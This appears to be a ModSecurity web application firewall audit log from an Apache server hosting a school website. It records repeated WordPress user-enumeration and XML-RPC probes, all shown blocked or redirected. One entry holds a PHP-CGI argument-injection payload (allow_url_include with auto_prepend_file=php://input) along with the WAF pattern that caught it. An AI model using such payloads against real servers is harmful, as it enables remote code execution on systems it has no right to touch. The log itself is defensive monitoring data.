Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16eff404-Z-- --4ac9107b-A-- [17/May/2025:23:56:56 +0700] aCi_2HyxdQCiyU1ENFf2egAAAAc 103.236.140.4 43772 103.236.140.4 8181 --4ac9107b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.72 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4ac9107b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ac9107b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501016917843 2958 (- - -) Stopwatch2: 1747501016917843 2958; combined=1341, p1=494, p2=820, p3=0, p4=0, p5=27, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ac9107b-Z-- --d7135b0d-A-- [17/May/2025:23:56:58 +0700] aCi_2gTOsBn9MSWb6WIw4QAAAJc 103.236.140.4 43886 103.236.140.4 8181 --d7135b0d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.27 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7135b0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7135b0d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501018900467 2312 (- - -) Stopwatch2: 1747501018900467 2312; combined=1007, p1=305, p2=679, p3=0, p4=0, p5=23, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7135b0d-Z-- --89720d15-A-- [17/May/2025:23:57:00 +0700] aCi_3BKi5m5upc8uMd56wAAAAMo 103.236.140.4 43956 103.236.140.4 8181 --89720d15-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.198 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --89720d15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --89720d15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501020303474 2845 (- - -) Stopwatch2: 1747501020303474 2845; combined=1306, p1=420, p2=853, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89720d15-Z-- --d386c03a-A-- [17/May/2025:23:57:03 +0700] aCi_3xKi5m5upc8uMd56_AAAAMY 103.236.140.4 44162 103.236.140.4 8181 --d386c03a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.90.72 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.90.72 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d386c03a-C-- demo.sayHello --d386c03a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d386c03a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501023747333 20388 (- - -) Stopwatch2: 1747501023747333 20388; combined=4484, p1=582, p2=3657, p3=46, p4=52, p5=87, sr=65, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d386c03a-Z-- --e7b1ea04-A-- [17/May/2025:23:57:06 +0700] aCi_4hKi5m5upc8uMd57MgAAAMM 103.236.140.4 44330 103.236.140.4 8181 --e7b1ea04-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.27 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.27 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e7b1ea04-C-- demo.sayHello --e7b1ea04-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7b1ea04-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501026763716 4952 (- - -) Stopwatch2: 1747501026763716 4952; combined=3715, p1=451, p2=3057, p3=42, p4=38, p5=76, sr=54, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7b1ea04-Z-- --3fca601c-A-- [17/May/2025:23:57:09 +0700] aCi_5RKi5m5upc8uMd57ZgAAANM 103.236.140.4 44472 103.236.140.4 8181 --3fca601c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.198 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.198 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3fca601c-C-- demo.sayHello --3fca601c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fca601c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501029582243 4870 (- - -) Stopwatch2: 1747501029582243 4870; combined=3636, p1=454, p2=2958, p3=50, p4=31, p5=84, sr=63, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fca601c-Z-- --40794236-A-- [17/May/2025:23:58:23 +0700] aCjALwTOsBn9MSWb6WIyYAAAAJE 103.236.140.4 48372 103.236.140.4 8181 --40794236-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.235 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40794236-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40794236-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501103708836 3172 (- - -) Stopwatch2: 1747501103708836 3172; combined=1413, p1=488, p2=896, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40794236-Z-- --5dd3ff1f-A-- [17/May/2025:23:58:31 +0700] aCjANxKi5m5upc8uMd5-DAAAAME 103.236.140.4 48892 103.236.140.4 8181 --5dd3ff1f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.235 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.235 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dd3ff1f-C-- demo.sayHello --5dd3ff1f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dd3ff1f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501111723782 6895 (- - -) Stopwatch2: 1747501111723782 6895; combined=4918, p1=686, p2=3975, p3=38, p4=42, p5=106, sr=85, sw=71, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dd3ff1f-Z-- --0b3b322f-A-- [17/May/2025:23:59:41 +0700] aCjAfQTOsBn9MSWb6WI0YgAAAJM 103.236.140.4 53908 103.236.140.4 8181 --0b3b322f-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 154.92.111.94 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 154.92.111.94 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --0b3b322f-C-- --0b3b322f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b3b322f-E-- --0b3b322f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501181548902 4570 (- - -) Stopwatch2: 1747501181548902 4570; combined=3096, p1=460, p2=2597, p3=0, p4=0, p5=38, sr=60, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0b3b322f-Z-- --e7408c65-A-- [18/May/2025:00:00:26 +0700] aCjAqum4kjNN-hEbWjL9lAAAAFA 103.236.140.4 57194 103.236.140.4 8181 --e7408c65-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.85 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e7408c65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7408c65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747501226685910 2526 (- - -) Stopwatch2: 1747501226685910 2526; combined=1330, p1=424, p2=874, p3=0, p4=0, p5=32, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7408c65-Z-- --4a7c477c-A-- [18/May/2025:00:00:34 +0700] aCjAshKi5m5upc8uMd6BWwAAAMk 103.236.140.4 57696 103.236.140.4 8181 --4a7c477c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.90.85 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.90.85 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4a7c477c-C-- demo.sayHello --4a7c477c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a7c477c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747501234139696 4677 (- - -) Stopwatch2: 1747501234139696 4677; combined=3409, p1=645, p2=2582, p3=28, p4=28, p5=74, sr=77, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a7c477c-Z-- --855c2246-A-- [18/May/2025:00:13:52 +0700] aCjD0HyxdQCiyU1ENFcRDAAAAA0 103.236.140.4 54030 103.236.140.4 8181 --855c2246-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --855c2246-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --855c2246-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502032400625 3288 (- - -) Stopwatch2: 1747502032400625 3288; combined=1757, p1=548, p2=1178, p3=0, p4=0, p5=31, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --855c2246-Z-- --86afde44-A-- [18/May/2025:00:13:58 +0700] aCjD1um4kjNN-hEbWjISMgAAAEM 103.236.140.4 54506 103.236.140.4 8181 --86afde44-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.236 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --86afde44-C-- demo.sayHello --86afde44-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --86afde44-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502038941171 6101 (- - -) Stopwatch2: 1747502038941171 6101; combined=4690, p1=636, p2=3803, p3=44, p4=55, p5=89, sr=64, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86afde44-Z-- --29723f54-A-- [18/May/2025:00:18:50 +0700] aCjE-um4kjNN-hEbWjIYxQAAAE4 103.236.140.4 44202 103.236.140.4 8181 --29723f54-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.45 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --29723f54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29723f54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502330494577 3625 (- - -) Stopwatch2: 1747502330494577 3625; combined=2042, p1=628, p2=1380, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29723f54-Z-- --ed0a7e5e-A-- [18/May/2025:00:18:57 +0700] aCjFARKi5m5upc8uMd6glwAAAMA 103.236.140.4 44648 103.236.140.4 8181 --ed0a7e5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.45 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.45 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ed0a7e5e-C-- demo.sayHello --ed0a7e5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ed0a7e5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747502337803627 5659 (- - -) Stopwatch2: 1747502337803627 5659; combined=4564, p1=639, p2=3714, p3=39, p4=54, p5=72, sr=55, sw=46, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ed0a7e5e-Z-- --46071d69-A-- [18/May/2025:00:21:35 +0700] aCjFnwTOsBn9MSWb6WJTxQAAAIs 103.236.140.4 52980 103.236.140.4 8181 --46071d69-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.121 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --46071d69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46071d69-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747502495067539 7666 (- - -) Stopwatch2: 1747502495067539 7666; combined=5959, p1=475, p2=5409, p3=0, p4=0, p5=73, sr=78, sw=2, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46071d69-Z-- --b8766a50-A-- [18/May/2025:00:21:41 +0700] aCjFpQTOsBn9MSWb6WJT2QAAAI4 103.236.140.4 53346 103.236.140.4 8181 --b8766a50-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.121 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --b8766a50-C-- demo.sayHello --b8766a50-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8766a50-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file 